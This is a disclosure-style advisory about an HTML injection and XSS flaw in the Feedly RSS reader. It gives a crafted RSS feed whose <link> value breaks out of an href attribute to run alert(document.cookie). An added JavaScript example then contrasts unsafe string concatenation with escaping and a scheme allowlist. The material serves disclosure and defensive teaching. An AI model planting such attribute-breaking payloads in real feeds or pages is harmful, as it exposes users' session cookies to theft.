* Feedly.com HTML Injection and XSS Vulnerability RSS feed
* ========================================================
*
* Site: http://feedly.com
* Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
* Follow me: http://www.linkedin.com/in/andreamenin
*
* ========================================================

Report-Timeline:
----------------
2013-07-02: Reported to domain's tech contact

Introduction:
-------------
Feedly.com is an RSS feed reader. Once you sign up (local account or
Google auth) you can add RSS feeds from your preferred web sites,
including by typing their URL.

Description:
------------
I found this XSS vulnerability and HTML injection by adding a fake RSS
feed with a JavaScript "injection" inside the <link> tag. I've seen that
Feedly.com doesn't escape/sanitize the quotes inside this tag, so I put
in something like this:

<link>http://www.bla.l33t/" onmouseover="alert(document.cookie)">bla</a></link>

Full RSS "Exploit" with injection on tag <link>:
------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
  <channel>
    <item>
      <title>Test XSS Vulnerability</title>
      <link>http://www.bla.l33t/" onmouseover="alert(document.cookie)">bla</a></link>
      <pubDate>Sun, 2 Jul 2013 22:56:41 GMT</pubDate>
      <description>XSS TEST, yuk!</description>
    </item>
  </channel>
</rss>

Screenshot XSS Vulnerability:
-----------------------------
http://goo.gl/fs2Vg

CREDITS:
---------
These vulnerabilities were discovered by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)

LEGAL NOTICES:
---------------
The Author accepts no responsibility for any damage caused by the use or
misuse of this information.
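
The attribute injection described in the Description section, shown next to a hardened renderer. This is an added example, not Feedly's code and not part of the original advisory; the function names, and the assumption that the reader builds an <a href="..."> element by string concatenation, are hypothetical.

```javascript
// Added example; function names are hypothetical, not Feedly's code.
// Constructed sample: the <link> value from the advisory's feed item.
const FEED_LINK =
  'http://www.bla.l33t/" onmouseover="alert(document.cookie)">bla</a>';

// Assumed vulnerable pattern: feed value concatenated into an attribute.
function renderLinkUnsafe(link, title) {
  return '<a href="' + link + '">' + title + '</a>';
}

// Escape the characters that can close an attribute value or open a tag.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Accept only absolute http(s) URLs; return null for anything else.
function safeHref(link) {
  try {
    const url = new URL(String(link).trim());
    return ['http:', 'https:'].includes(url.protocol) ? url.href : null;
  } catch (err) {
    return null; // not parseable as an absolute URL
  }
}

// Hardened form: allowlist the scheme, then escape every feed-supplied value.
function renderLinkSafe(link, title) {
  const href = safeHref(link);
  const text = escapeHtml(title);
  if (href === null) return '<span>' + text + '</span>';
  return '<a href="' + escapeHtml(href) + '">' + text + '</a>';
}

// Attribute names a browser would see on the first opening tag.
function attributeNames(html) {
  const tag = /^<\w+((?:\s+[\w-]+(?:="[^"]*")?)*)\s*>/.exec(html);
  if (!tag) return [];
  return [...tag[1].matchAll(/\s+([\w-]+)(?:="[^"]*")?/g)].map((m) => m[1]);
}

console.log(attributeNames(renderLinkUnsafe(FEED_LINK, 'Test XSS Vulnerability')));
console.log(attributeNames(renderLinkSafe(FEED_LINK, 'Test XSS Vulnerability')));
```

With the unsafe renderer the quote in the feed value closes href and the browser sees a second attribute; with the hardened renderer the whole value stays inside href.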